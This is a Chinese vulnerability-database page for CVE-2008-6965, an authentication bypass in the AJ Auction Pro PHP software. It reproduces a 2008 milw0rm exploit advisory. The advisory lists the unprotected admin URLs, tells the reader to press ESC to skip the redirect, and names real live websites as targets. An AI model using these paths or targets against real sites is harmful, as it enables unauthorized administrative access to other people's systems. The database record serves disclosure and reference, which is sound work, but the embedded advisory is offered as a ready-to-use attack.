https://www.exploit-db.com/exploits/7087
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-152
Aj_Square AJ Auction Pro身份认证绕过漏洞






漏洞ID | 1116704 | 漏洞类型 | 授权问题 |
发布时间 | 2008-11-10 | 更新时间 | 2009-08-13 |
![]() |
CVE-2008-6965 | ![]() |
CNNVD-200908-152 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
当特定脚本被直接呼叫时,AJSquareAJAuctionOOPD,ProPlatinumSkin#1,ProPlatinumSkin#2以及Web2.0版本会发送一个并不存在的重定向指令,这使得远程攻击者可以借助对admin/中(1)site.php,(2)auction.php,(3)mail.php,(4)fee_setting.php,(5)earnings.php,(6)insertion_fee_settings.php,(7)custom_category.php,(8)subcategory.php,(9)category.php,(10)report.php,(11)store_manager.php和(12)choose_sell_format.php的一个直接请求以及可能其他向量,绕过身份认证。
|漏洞EXP
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\
==============================================================================
AJ Auction Auth Bypass Vulnerability
==============================================================================
[»] Script: [ AJ Auction ]
[»] Language: [ PHP ]
[»] Website: [ http://www.ajsquare.com/products/auction/ ]
[»] Type: [ Commercial ]
[»] Report-Date: [ 10.11.2008 ]
[»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ]
[-] AJ Auction OOPD
[+] AJ Auction Pro Platinum Skin #1
[+] AJ Auction Pro Platinum Skin #2
[+] AJ Auction Web 2.0
===[ XPL ]===
[!] When the page gets load, Press ESC btn To Bypass Redirection ;)
[ Only AJ Auction Pro Platinum Skin #1 ]
[»] http://localhost/[path]/admin/user.php
[ all ]
[»] http://localhost/[path]/admin/site.php
[»] http://localhost/[path]/admin/auction.php
[»] http://localhost/[path]/admin/mail.php
[»] http://localhost/[path]/admin/fee_setting.php
[»] http://localhost/[path]/admin/earnings.php
[»] http://localhost/[path]/admin/insertion_fee_settings.php
[»] http://localhost/[path]/admin/custom_category.php
[»] http://localhost/[path]/admin/subcategory.php
[»] http://localhost/[path]/admin/category.php
[»] http://localhost/[path]/admin/report.php
[»] http://localhost/[path]/amdin/store_manager.php
[»] http://localhost/[path]/admin/choose_sell_format.php
[»] ...
===[ LIVE ]===
[!] Skin #1
[»] http://www.ajauctionpro.com/ajauction_platinum/admin/index.php
[»] http://www.tapinglobal.com/admin/
[!] Web2.0
[»] http://www.ajauctionpro.com/auction_web2.0/admin/index.php
===[ Greetz ]===
[»] ALLAH
[»] Tornado2800 <Tornado2800[at]gmail.com>
[»] Hussain-X <darkangel_g85[at]yahoo.com>
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...
===============================================================================
exit();
===============================================================================
# milw0rm.com [2008-11-10]
|参考资料
来源:XF
名称:ajauction-admin-authentication-bypass(46528)
链接:http://xforce.iss.net/xforce/xfdb/46528
来源:BID
名称:32243
链接:http://www.securityfocus.com/bid/32243
来源:MILW0RM
名称:7087
链接:http://www.milw0rm.com/exploits/7087
检索漏洞
开始时间
结束时间